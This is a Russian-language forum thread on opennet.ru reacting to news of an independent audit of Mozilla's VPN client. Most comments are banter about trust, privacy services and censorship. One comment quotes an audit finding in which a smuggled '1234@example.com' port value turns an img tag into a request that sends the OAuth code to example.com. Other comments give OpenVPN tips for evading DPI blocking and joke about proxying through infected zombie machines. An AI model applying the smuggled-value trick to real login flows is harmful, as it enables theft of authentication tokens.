URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 125172
[ Назад ]
Исходное сообщение
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено opennews , 03-Сен-21 10:15 
Компания Mozilla объявила о завершении независимого аудита клиентского ПО для подключения к сервису Mozilla VPN. В ходе аудита был выполнен анализ обособленного клиентского приложения, написанного с использованием библиотеки Qt и поставляемого для Linux, macOS, Windows, Android и iOS.  Работу  Mozilla VPN обеспечивает более 400 серверов шведского VPN-провайдера Mullvad, размещённых в более чем 30 странах. Подключение к VPN-сервису производится при помощи протокола WireGuard...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=55730

Содержание
Сообщения в этом обсуждении
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 10:15 
Лучшая — лучшая организация в мире! Как бы я хотел там работать, но я туповат для этого.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено большинство , 03-Сен-21 10:39 
Укажи в резюме, что сочувствуешь меньшинствам.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 13:23 
"Отношусь к интеллектуальнму меньшинству" и все, не смогут не взять!
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 13:44 
А если начнут устраивать сегрегацию по интеллектуальному признаку засудить нафиг.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 04-Сен-21 05:08 
> "Отношусь к интеллектуальнму меньшинству" и все, не смогут не взять!

Если интеллекта не хватает - таки, увы, не к меньшинству. FAIL!

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено КО , 03-Сен-21 10:53 
Что-то Speech-to-text у данной организации до сих пор не готов.
Даже элементарный переводчик до сих пор дорабатывают.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:57 
это раст
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Enamel , 03-Сен-21 17:32 
при чем тут раст?
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 11:02 
Ах если бы... Мозилка в последнее время коллективно поехала кукухой и топит за цензуру.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 16:29 
Пруфца бы...
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Пикапика , 04-Сен-21 18:37 
https://blog.mozilla.org/en/mozilla/we-need-more-than-deplat.../
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 13:16 
Cure53?
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:54 
> Лучшая — лучшая организация в мире! Как бы я хотел там работать, но я туповат для этого.

Т.е. ты хотел бы прислуживать и быть на побегушках у обезьянок? Или ты сам оно?

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 05-Сен-21 19:49 
Чувак, не парься. Я, вот, например, тоже туповат чтобы меня взяли во всякие мозиллы, гуглы, микрософты. Но я достаточно умён чтобы не пытаться туда устраиваться. В отличие от уже туда устроившихся. Вы только посмотрите какое г-но они в итоге производят. Занюхаешься! Ням-ням. Мухи-мухи.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 10:21 
Так а смысл, если сам по себе WireGuard отстреливается на ура?
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено OpenEcho , 03-Сен-21 13:49 
Пруффс плыз
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:14 
В моей сети, например, открыт только TCP 443. WireGuard через него не работает.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено OpenEcho , 03-Сен-21 14:47 
> В моей сети, например, открыт только TCP 443. WireGuard через него не
> работает.

Под термином "отстреливается на ура" обычно понимается - "стукачит" или "home calling"

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено mumu , 03-Сен-21 17:28 
https://letmegooglethat.com/?q=how+to+change+default+wiregua...
Не благодари
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:39 
А что, вас уже не только VPN, но и в уточке/гугле/яндыхе/мёртвом рамблере забанили?
Ну вот, например, баян https://habr.com/ru/post/415977/ с тех пор радикально вроде ничего не менялось
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено OpenEcho , 03-Сен-21 15:14 
Повторюсь: 'Под термином "отстреливается на ура" обычно понимается - "стукачит" или "home calling" '

> Ну вот, например, баян https://habr.com/ru/post/415977/ с тех пор радикально вроде ничего
> не менялось

Если же имелось в виду отследить и заблокировать (отстрелить), то в эту игру можно долго играть инкапсулируя шифрованные потоки


Что касается (из статьи):
'«Явные» VPN, туннели и прокси (OpenVPN, L2TP/IPSec, SOCKS, и др.) Обычные VPN и туннели вполне могут блокироваться автоматически, как, например, это происходит в Китае и Венесуэле.'

не совсем правда, т.к. в основном применяемые там DPI насторенны в основном на дефолтовые настройки. Взять то же OpenVPN, если во первых не на стандартном порту, во вторых только через UDP, в третьих, обязательно изпользовать TLS ключ для обоих направлений и обязательно использовать TLS-key для обоих-авторизации & шифровании, ну и не применять сжатие, и добавть шум в поток, то на таком такой трафике DPI загнется.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 15:52 
Отстреливается значит убивается. А ваши дополнительные хотелки - это уже конкретные имплементации, дыры и закладочки в конкретных продуктах.

Про непобедимость OpenVPN - влажные мечты)

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено OpenEcho , 03-Сен-21 16:10 
> Про непобедимость OpenVPN - влажные мечты)

Да я вроде как и не говорил про "непобедимость OpenVPN", т.к. приходится часто работать на "два-фронта" ;)

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 04-Сен-21 05:09 
Да вон на гитхабе кто-то уже накорябал модуль трансформации трафика.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено iPony129412 , 03-Сен-21 10:24 
Жаль всё ограниченно по территории сильно.
А так заканчивается подписка на protonVPN - жду их ❤🦊
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 10:46 
А как же 🐎VPN? Всем поням премиум-аккаунт бесплатно!
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:58 
Потому что ты живешь в устарелой стране
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 16:27 
Рaбы должны страдать...
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 10:24 
Когда будут опубликованы результаты аудита аудитора? И аудита аудитора аудитора?
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Sergey , 03-Сен-21 10:28 
Зачем так сложно ? Ведь написано Мозилла объявила ...
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 11:02 
> Когда будут опубликованы результаты аудита аудитора с помощью PVS Studio?

пофиксил

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 12:21 
>Когда будут опубликованы результаты аудита аудитора

Когда будут опубликованы результаты проверки аудитора на соответствие требованиям для допуска к гостайне.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 16:25 
Публикую. Результат хороший!
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено ixrws , 03-Сен-21 10:32 
И с каких пор такой аудит считается показателем чего либо? Там работают люди, даже если они свою работу сделали хорошо(а откуда мы знаем?), то они всего лишь люди и могли не заметить массу всего.

Какой-то странный мир стал, люди доверяют каким-то заявлениям просто потому, что одно громкое имя сделало подпись под заявлением. Ну так таким макаром можно доверять и Гитлеру, там громких имён с подписями было достаточно и аудиты разного рода они тоже проводили.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Enamel , 03-Сен-21 10:35 
По такой логике нужно срочно отключиться от интернета, выкинуть всю технику и уйти в лес
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноньимъ , 03-Сен-21 15:58 
Это довольно разумная стратегия в современном мире на самом деле.
Сильно повысит ваши шансы на выживание.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Корпоративный_сисадмин , 03-Сен-21 17:44 
Занятное утверждение. Боюсь только, большинство тутошнего контингента ничего тяжелее мышки в руках не держало, а потому долго в лесу не протянут даже при наличии пропитания (что под большим вопросом) и жилья...  
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноньимъ , 03-Сен-21 18:11 
Это верно конечно.
Но и в квартире с заваренной дверью без еды как-то то-же долго не протянешь.
Не говоря уже если скажем исчезнет электричество отопление и вода.
В дикой природе у мышковоза будет хотя-бы маленький шанс.

Говорят более разумной тактикой будет выживание в городе, именно городе, а не мегаполисе, или деревне.
Но хижина в лесу то-же неплохая идея.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено При , 04-Сен-21 07:58 
При сталине за уход в лес отправляли в лагеря или расстреливали
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Нанобот , 03-Сен-21 10:43 
Наличие аудита лучше отсутствия аудита.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 11:18 
> Ну так таким макаром можно доверять и Гитлеру

Иногда думаешь, что комментаторы с Опеннета уже ничем тебя не удивят, но раз за разом оказываешься неправ.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Alex , 03-Сен-21 13:24 
Так Гитлеру и доверял весь западный мир. Пока он бомбить не начал теми кто доверял ему больше.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:41 
Теми? Офигительная история
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 16:23 
Поколение ЕГЭ, **ли!
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Особенно , 04-Сен-21 08:00 
Особенно великобритания и сша
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 10:37 
> вопросы, связанные с криптографией не рассматривались

Кстати, почему?

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 10:42 
На аудите криптографии и кода  специализируются разные конторы. Там протокол WireGuard, внешний аудит которого, насколько я могу судить,  пока ещё никто не проводил.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено хм , 03-Сен-21 10:52 
Так он же формально верифицирован.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено OpenEcho , 03-Сен-21 13:54 
> Там протокол WireGuard, внешний аудит которого, насколько я могу судить,  пока ещё никто не проводил.

Анализ от MIT подойдет судье?

https://courses.csail.mit.edu/6.857/2018/project/He-Xu-Xu-Wi...

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 11:06 
Потому что это не софт мозиллы. Плюс, мозилла на самом деле не заведует VPN-сервисом -- они перепродают Mullvad. А вот те ребята уже упарываются по верификации всего и вся. Почитай про их проект System Transparency, в рамках которого они пытаются гарантировать, что их vpn-cерверы крутят именно тот софт, который заявлен. Весьма крутая штука.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 12:12 
Весьма крутая штука на словах. Не забываем из какой страны ложное обвинение Ассанжа пришло.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 13:18 
Так же не забываем, в какой стране появился The Pirate Bay. Я думаю, он один перекрывает десяток поехавших феминисток.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 10:59 
Все так же доверять можно лишь ProtonVPN.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено iPony129412 , 03-Сен-21 11:17 
Это когда они в открытую врали с самолётом? ✈
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 12:12 
А что там было с самолетом?
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено iPony129412 , 03-Сен-21 12:43 
> А что там было с самолетом?

https://www.reuters.com/world/europe/email-bomb-threat-sent-.../

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 13:29 
Спасибо, теперь я их презираю. Где лучше почту завести?
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:17 
Рамблер/почта
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:38 
Они ведь полностью под контролем ФСБ поэтому не подходят.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 15:04 
Пользуйся PGP и VPN.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Массоны Рептилоиды , 03-Сен-21 15:45 
> Спасибо, теперь я их презираю. Где лучше почту завести?

https://vk.com/press/vk-mail

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 16:30 
Мейлру конечно.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:16 
>Access Denied
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 12:16 
Ну доверяют же "безопасному" Телеграмму. А там враньё на вранье и враньем погоняет.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 23:15 
давай прувы, трепло
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 04-Сен-21 11:07 
Единственный который ты мог бы осилить самого начала - привязка юзера к номеру его телефона. Но ты не осилил. Так что разговор с тобой бессмыслен.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:46 
А что именно из этого врали? Письмо сами себе отправили после собственного терракта? Ну так какая разница откуда его отправили, ещё и с такой "беспаливной" формулировкой как была опубликована.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Корпоративный_сисадмин , 03-Сен-21 20:50 
Полагаю, речь была о том, что ушлые ребятки из ProtonMail сами таки читают твою почту (хоть и мешают делать это другим) и делятся прочитанным с органами. Приватная такая приватность.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 04-Сен-21 02:33 
> читают твою почту

Ну ну.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 05-Сен-21 19:55 
Да-да
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 15:02 
Твоя информация безбожно устарела. Твой поиск адекватной информации тоже.

Ты как та бабка в синих кедах и такую же информацию собираешь. С самолётом уже всё давно не так. А эти твои ссылки такой же бред как и каждый твой комментарий.

Прогнивший на сквозь ненавистью к самому себе бедный больной поняш.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 15:36 
Не обижай поней, понефоб. Мне тебя жалко.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено OpenEcho , 03-Сен-21 14:02 
> Все так же доверять можно лишь ProtonVPN.

Доверять можно только купленному
VPS за бугром с установленным VPN-om, который соединен к другому
VPS за бугром с установленным VPN-om, который соединен к другому
VPS за бугром с установленным VPN-om, который соединен к другому
...
...
...
VPS за бугром с установленным VPN-om, который соединен к другому,
который в свою очередь использует купленные на черном рунке зараженные зомби, проксировав через которые  надо чейнить к цепочке
VPS за бугром с установленным VPN-om, который соединен к другому
VPS за бугром с установленным VPN-om, который соединен к другому
...
VPS за бугром с установленным VPN-om, который соединен к другому

Но презик на всякий случай все равно лучше иметь, т.к. фингерпринт браузера обнулит всю эту хитропопость

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:24 
Доверяю Tor Browser через 2 VPN.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:47 
а пока ты ему доверяешь, твой реальный адрес течёт напрямую из дырявого браузера
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 15:34 
И какой же он?
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 17:23 
127.0.0.1
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Led , 03-Сен-21 15:59 
>Но презик на всякий случай все равно лучше иметь
>обнулит

Так у вас же и так есть обнулённый презик?

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено OpenEcho , 03-Сен-21 16:13 
> Так у вас же и так есть обнулённый презик?

Та ну нафиг, мы только rfc1149 юзаем

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 11:04 
У нас 6 впн сервисов сейчас заблокировали и этот если надо ляжет. Вообще конечно продолжайте делать ставки на спорт и верить в криптомани.  Лох не мамонт - лох не вымрет С.Мавроди (с)
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Moomintroll , 03-Сен-21 11:11 
"обособленного" - это "proprietary"? В данном контексте, по-моему, неудачный перевод.
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:18 
Видимо имелось в виду отдельное приложение, а не дополнение к браузеру.

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 14:27 
Развели заопарк в этой мозиле. Gtk, rust, Qt.

Выбрасывайте всё это и идите на Qt полнсотью. Может тода им пользоваться можно будет. А то таки единственный вменяемый браузер какраз на Qt. Вернее их 2

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 03-Сен-21 15:12 
> аудентификации OAuth через подмену номера порта на строку вида "1234@example.com", что приведёт к установке тега <img src="http://127.0.0.1:1234@example.com/?code=..." alt="">, обращающегося к example.com вместо 127.0.0.1.

аудентификации, OAuth, тэги

всё что нужно знать о мартышках и в том числе мартышках в мозиле

"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено Аноним , 04-Сен-21 15:27 
Популярность Firefox падает судя по статистике
"Опубликованы результаты аудита VPN-клиента Mozilla"
Отправлено YetAnotherOnanym , 04-Сен-21 23:10 
> captive portal

За эту гадость могиловцам следовало поотбивать руки когда оно только появилось.